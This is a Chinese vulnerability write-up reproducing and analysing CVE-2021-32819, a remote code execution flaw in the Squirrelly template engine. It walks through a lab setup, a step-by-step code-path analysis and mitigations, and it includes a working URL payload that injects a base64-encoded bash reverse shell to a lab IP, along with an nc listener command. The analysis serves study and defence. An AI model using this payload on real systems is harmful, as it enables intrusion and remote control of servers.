[toc] 漏洞概述Squirrelly 是一个用 JavaScript…
[toc]
漏洞概述
Squirrelly 是一个用 JavaScript 实现的现代、可配置且速度极快的模板引擎。它与 ExpressJS 一起开箱即用,完整版的 gzip 压缩后仅重约 4KB。
2021 年 5 月 14 日,在 SquirrellyJS 从 v8.0.0 到 v8.0.8 及以上的版本爆出了一个漏洞(CVE-2021-32819)。官方对该漏洞原因的描述如下:
The Express render API was designed to only pass in template data. By allowing template engine configuration options to be passed through the Express render API directly, downstream users of an Express template engine may inadvertently introduce insecure behavior into their applications with impacts ranging from Cross Site Scripting (XSS) to Remote Code Execution (RCE).
大致原因就是 Squirrelly 通过 Express 渲染 API 将纯模板数据与引擎配置选项混合。攻击者可以通过请求查询来覆盖并控制全局变量 defaultConfig
(一组内部模板引擎配置选项)中的defaultFilter
属性。下游用户可能会无意中将不安全的行为引入他们的应用程序。该漏洞影响范围从跨站点脚本(XSS)到远程代码执行(RCE)。
漏洞复现
这里我们在 Linux 服务器上进行测试。
环境搭建
安装 Nodejs 环境、Node Package Manager(NPM)以及 ExpressJS 和 SquirellyJS 模块:
sudo apt update
sudo apt install nodejs npm
mkdir CVE-2021-32819 && cd CVE-2021-32819
npm install express
npm install squirrelly
然后编写如下易受攻击的服务端代码:
- server.js
const express = require('express')
const squirrelly = require('squirrelly')
const app = express()
app.set('views', __dirname);
app.set('view engine', 'squirrelly')
app.use(express.urlencoded({ extended: false }));
app.get('/', (req, res) => {
res.render('index.squirrelly', req.query)
})
var server = app.listen(3000, '0.0.0.0', function () {
var host = server.address().address
var port = server.address().port
console.log("Listening on http://%s:%s", host, port)
});
编写模板文件:
- index.squirrelly
<html>
<head>
<title>CVE-2021-32819</title>
<h1>Test For CVE-2021-32819</h1>
</head>
<body>
<h1>\{\{it.variable\}\}</h1>
</body>
</html>
运行服务端代码:
node server.js
漏洞验证
首先在攻击机上开启 nc 监听:
nc -lvp 2333
然后发送如下 payload:
http://192.168.226.148:3000/?defaultFilter=e'))%3B%20let%20require%20%3D%20global.require%20%7C%7C%20global.process.mainModule.constructor._load%3B%20require('child_process').exec('echo%20YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjIyNi4xNDMvMjMzMyAgMD4mMQ%3D%3D%7Cbase64%20-d%7Cbash')%3B%20%2F%2F
# http://192.168.226.148:3000/?defaultFilter=e')); let require = global.require || global.process.mainModule.constructor._load; require('child_process').exec('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyNi4xNDMvMjMzMyAgMD4mMQ==|base64 -d|bash'); //
如下图所示,成功反弹 Shell:
漏洞分析
当我们发送如下请求后:
/?defaultFilter=HelloWorld
Express 最终都会通过这个 engine
来调用 Squirrelly 模板引擎中的 renderFile
函数进行渲染(node_modules/express/lib/view.js):
我们跟进 Squirrelly 模板引擎中的 renderFile
函数
renderFile
renderFile
函数可以传入以下三个参数:
- filename:模板文件的路径
- data:包含请求查询的模板数据,大致如下:
{
settings: {
...,
},
variable: "HelloWorld",
_locals: {},
cache: false,
}
- cb:定义一个回调函数
renderFile
函数首先调用了 getConfig
函数,然后有调用了 tryHandleCache
函数,我们首先跟进 getConfig
。
getConfig
- override:该参数包含请求查询的模板数据,大致如下:
{
settings: {
...,
},
variable: "HelloWorld",
_locals: {},
cache: false,
}
- baseConfig:该参数未定义
getConfig
函数首先将 res
变量定义为一个空对象,然后将全局变量 defaultConfig
(一组编译配置选项)的内容复制到 res
对象中,然后跳过 baseConfig
条件,然后将 override
的内容覆盖到 res
对象中,最后将 res
返回到 renderFile
函数作用域中的 Config
变量中。此时 Config
变量的内容如下:
{
varName: 'it',
...,
autoEscape: true,
defaultFilter: false,
...,
settings: {...},
variable: 'HelloWorld',
...
}
请求查询被赋给 Config
对象,这是一组编译选项,这就意味着发送者可以覆盖 Config
属性值。
调用完 getConfig
函数只会,renderFile
函数有调用了 tryHandleCache
函数,跟进 tryHandleCache
。
tryHandleCache
- options:是一组编译选项
{
varName: "it",
...,
autoEscape: true,
defaultFilter: false,
tags: ["\{\{", "\}\}"],
...,
variable: "HelloWorld",
_locals: {},
...
}
- data:包含请求查询的模板数据
{
settings: { ... },
variable: "HelloWorld",
_locals: {},
cache: false,
}
- cb:定义一个回调函数
tryHandleCache
函数会调用 handleCache
函数,跟进 handleCache
。
handleCache
- options:是一组编译选项
{
varName: "it",
autoTrim: [
false,
"nl",
],
autoEscape: true,
defaultFilter: false,
...,
variable: "HelloWorld",
_locals: {
},
...
}
handleCache
函数将获取模板文件(index.squirrelly)的内容,然后调用 compile
函数。
compile
- str:该参数是前面通过
handleCache
函数获取到的模板文件(index.squirrelly)的内容:
"\n<html>\n<head>\n<title>CVE-2021-32819</title>\n<h1>Test For CVE-2021-32819</h1>\n</head>\n<body>\n<h1>\{\{it.variable\}\}</h1>\n</body>\n</html>"
- env:是一组编译选项
{
varName: "it",
autoTrim: [
false,
"nl",
],
autoEscape: true,
defaultFilter: false,
...,
variable: "HelloWorld",
_locals: {
},
...
}
compile
函数将编译选项定义为 env,然后在创建一个名为 ctor 的函数构造的别名,然后返回一个新的构造函数,最后进入到 compileToString
函数。跟进 compileToString
。
compileToString
- str:该参数是前面通过
handleCache
函数获取到的模板文件(index.squirrelly)的内容
"\n<html>\n<head>\n<title>CVE-2021-32819</title>\n<h1>Test For CVE-2021-32819</h1>\n</head>\n<body>\n<h1>\{\{it.variable\}\}</h1>\n</body>\n</html>"
- env:是一组编译选项
{
varName: "it",
autoTrim: [
false,
"nl"],
autoEscape: true,
defaultFilter: false,
...,
variable: "HelloWorld",
_locals: {},
...
}
compileToString
函数定义一个 buffer
缓冲区并调用解析函数 parse
来解析模板内容及其变量:
[
"\n<html>\n<head>\n<title>CVE-2021-32819</title>\n<h1>Test For CVE-2021-32819</h1>\n</head>\n<body>\n<h1>",
{
f: [
],
c: "it.variable",
t: "i",
},
"</h1>\\n</body>\\n</html>",
]
其中 compileToString
函数调用了 compileScope
函数,跟进 compileScope
。
compileScope
export function compileScope (buff: Array<AstObject>, env: SqrlConfig) {
var i = 0
var buffLength = buff.length
var returnStr = ''
for (i; i < buffLength; i++) {
var currentBlock = buff[i]
if (typeof currentBlock === 'string') {
var str = currentBlock
returnStr += "tR+='" + str + "';"
} else {
var type: ParsedTagType = currentBlock.t as ParsedTagType // h, s, e, i
var content = currentBlock.c || ''
var filters = currentBlock.f
var name = currentBlock.n || ''
var params = currentBlock.p || ''
var res = currentBlock.res || ''
var blocks = currentBlock.b
var isAsync = !!currentBlock.a
if (type === 'i') {
if (env.defaultFilter) {
content = "c.l('F','" + env.defaultFilter + "')(" + content + ')'
}
var filtered = filter(content, filters)
if (!currentBlock.raw && env.autoEscape) {
filtered = "c.l('F','e')(" + filtered + ')'
}
returnStr += 'tR+=' + filtered + ';'
} else if (type === 'h') {
...
} else if (type === 's') {
...
} else if (type === 'e') {
...
}
}
}
return returnStr
}
- buff:一个包含之前解析生成的模板内容的数组
[
"\n<html>\n<head>\n<title>CVE-2021-32819</title>\n<h1>Test For CVE-2021-32819</h1>\n</head>\n<body>\n<h1>",
{
f: [
],
c: "it.variable",
t: "i",
},
"</h1>\\n</body>\\n</html>",
]
- env:是一组编译选项
{
varName: "it",
autoTrim: [false, "nl"],
autoEscape: true,
defaultFilter: false,
...,
variable: "HelloWorld",
_locals: { },
...
}
compileScope
中主要就是一个 for 循环,遍历 buff 中的模板内容,如果元素是一个字符串,它会将字符串添加到 returnStr
变量中。如果它不是字符串,则继续执行 else 部分。
其中第一个元素 buff[0]
和最后一个元素 buff[2]
是一个字符串:
[
"\n<html>\n<head>\n<title>CVE-2021-32819</title>\n<h1>Test For CVE-2021-32819</h1>\n</head>\n<body>\n<h1>",
......
"</h1>\\n</body>\\n</html>",
]
中间的元素 buff[1]
是一个对象:
{
f: [],
c: "it.variable",
t: "i",
}
compileScope
函数会检查 env.defaultFilter
是否设置了,如果有设置 env.defaultFilter
,则将 env.defaultFilter
的值添加到 content
变量中。但是现在 env.defaultFilter
还是没有被设置的。然后 filter
函数将 content
内容返回给 filtered
变量:
tR+='\n<html>\n<head>\n<title>CVE-2021-32819</title>\n<h1>Test For CVE-2021-32819</h1>\n</head>\n<body>\n<h1>';
tR+=c.l('F','e')(it.variable);
tR+='</h1>\\n</body>\\n</html>';
最后将 filtered
的内容添加到 returnStr
变量中并返回给 compileToString
函数作用域的 res
变量中,然后再由 compileToString
函数将 res
变量的内容拼接成一个匿名函数,内容如下:
var res = "var tR='';" + "tR+='\n<html>\n<head>\n<title>CVE-2021-32819</title>\n<h1>Test For CVE-2021-32819</h1>\n</head>\n<body>\n<h1>';tR+=c.l('F','e')(it.variable);tR+='</h1>\\n</body>\\n</html>';" + 'if(cb){cb(null,tR)} return tR'
// it.variable 的值为 HelloWorld
当返回到 handleCache
函数时,将会执行匿名函数:
(function anonymous(it,c,cb
) {
var tR='';
tR+='\n<html>\n<head>\n<title>CVE-2021-32819</title>\n<h1>Test For CVE-2021-32819</h1>\n</head>\n<body>\n<h1>';
tR+=c.l('F','e')(it.variable);
tR+='</h1>\n</body>\n</html>';
if(cb){cb(null,tR)}
return tR
})
看到这里你应该就明白了。这个漏洞主要的引入点就是 compileScope
函数中的 env.defaultFilter
,我们可以通过 URL 中的参数来覆盖这个配置属性的值,比如:/?defaultFilter=payload
可以将 env.defaultFilter
的值覆盖为我们的 payload。并且一旦设置了 env.defaultFilter
的值,将进入到以下代码:
content = "c.l('F','" + env.defaultFilter + "')(" + content + ')';
可知我们可以通过设置 env.defaultFilter
的值来注入希望执行的代码。所以该漏洞利用的 Payload 如下:
http://192.168.226.148:3000/?defaultFilter=e')); let require = global.require || global.process.mainModule.constructor._load; require('child_process').exec('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyNi4xNDMvMjMzMyAgMD4mMQ==|base64 -d|bash'); //
# 使用时需进行 URL 编码
可能受到该漏洞影响的项目
分析github上100星以上的项目,共有380个项目使用了squirrelly组件,其中有42个项目使用了存在漏洞的8.0.8版本,具体的项目清单如下,有使用的TX可以自查一下:
漏洞防御措施
该漏洞到目前为止还没有被修复,所以如果你在项目中使用了 Squirrelly 组件,那么都需要小心该类型漏洞的出现。而对于不得已必须使用这种技术的项目,最好做好防御措施,包括:
- 降低运行该进程的用户的权限
- 限制该进程可以访问的路径
- 对用户输入进行白名单控制
- 对于该进程可以执行的操作系统命令做白名单控制
Ending......
参考:
https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
- 本文作者: WHOAMIAnony
- 本文来源: 奇安信攻防社区
- 原文链接: https://forum.butian.net/share/472
- 版权声明: 除特别声明外,本文各项权利归原文作者和发表平台所有。转载请注明出处!